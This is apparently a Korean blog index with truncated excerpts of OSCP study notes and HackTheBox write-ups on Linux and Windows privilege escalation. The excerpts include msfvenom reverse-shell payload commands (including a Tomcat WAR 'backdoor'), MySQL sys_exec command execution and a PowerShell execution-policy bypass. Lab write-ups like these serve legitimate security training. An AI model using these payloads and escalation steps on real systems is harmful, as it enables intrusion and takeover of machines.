전체 글 205

Linux privsec 테크닉

리눅스 manual 테크닉https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html Kernel exploits-다른 쳅터 참고 Programs running as root>ps aux Mysql root로 실행중이고 디비 접속 가능하다면 쉘 실행가능select sys_exec('whoami');select sys_eval('whoami');+User Defined function Installed software- 설치되는 폴더가 넘 광범위함, 스크립트를 활용하거나 dpkg만....# Debiandpkg -l Weak/reused/plaintext passwords- DB가 저장된 웹소스, 설정파일 찾..

OSCP/시험대비 2020.09.29

Windows privsec 테크닉

https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842 *주목해야할 권한 주체Authenticated UserNT AUTHORITY\INTERACTIVEBUILTIN\Users(로그인 사용자)Everyone 스크립트마다 누락된 사항이 있을 수 있기 때문에 여러개를 돌려봐야함, 수동으로 찾아보는 것도 추천된다. Sherlock (Deprecated) => Watsons 사용할 것https://github.com/rasta-mouse/Watson 커맨드창에서 파워 쉘 실행 옵션powershell -noprofile -nologo -ep bypass -file WindowsEnum.ps1 * RDP허용? O, 저장된 패스..

OSCP/시험대비 2020.09.28

[Windows] Access

Access- MS Access DB읽어오는 방법- tool설치하거나 칼리에 있는거 사용하거나- 파워쉘 막혔을떄 어떻게 할지, StoredCredentials root@kali:/HTB/Access# ftpftp> binaryftp> get backup.mdbftp> get "Access Control.zip" * wget을 사용해서 ftp 익명유저로 다운로드 가능함, 이방법이 ftp접근해서 get하는 것보다 편리함wget -m ftp://anonymos:anonymous@10.10.10.98wget -m --no-passive ftp://anonymos:anonymous@10.10.10.98 root@kali:/HTB/Access# file backup.mdbroot@kali:/HTB/Access# s..

OSCP/HackTheBox 2020.09.26

[Windows] Chatterbox

Chatterbox- Exploit POC 스크립트를 수정하는 법을 알아야함- 파워쉘 명령어에 익숙해야함 Achat.exe에 대한 exploit이 존재함=> 페이로드 poc가 cmd 실행으로 되어있어서 리버스 쉘 옵션으로 교체함그 외 배드캐릭터 옵션과 인코딩 등 다른 옵션들은 그대로 사용 msfvenom -a x86 platform windows -p windows/shell_reverse_tcplhost=... lport=... -e x86/unicode_mixed -b "\x00...." BufferRegister=EAX -f python 완성된 쉘코드를 파이썬 스크립트 상에서 교체 후 타겟 IP와 포트 확인 후 변경하여 Exploit +POC 분석에 대하여 1152 - len(Payload)이 코드..

OSCP/HackTheBox 2020.09.24

[Windows] Jerry

Jerry 배운점- 디폴트페이지 접근- msfvenom .war 타입 쉘 지원 1. tomcat 메니저 페이지 접근 후 디폴트 credential 입력 /manager/html 2. msfvenom으로 jsp/war 타입 리버스쉘 페이로드 생성하여 업로드msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.xx.xx LPORT=4449 -f war > backdoor.war 잘못된 점- msfvenom에서 war타입 리버스 쉘을 제공하는지 모르고 빙빙돌아감 1. 칼리에 존재하는 jsp 웹쉘 war파일을 올린 후 msfvenom으로 tcp리버스 쉘 생성하여 업로드 2. jsp웹쉘에 접근, 파워쉘로 venom 페이로드 다운로드 받았지만 exe파일 실행이 안되서 망함. 3..

OSCP/HackTheBox 2020.09.24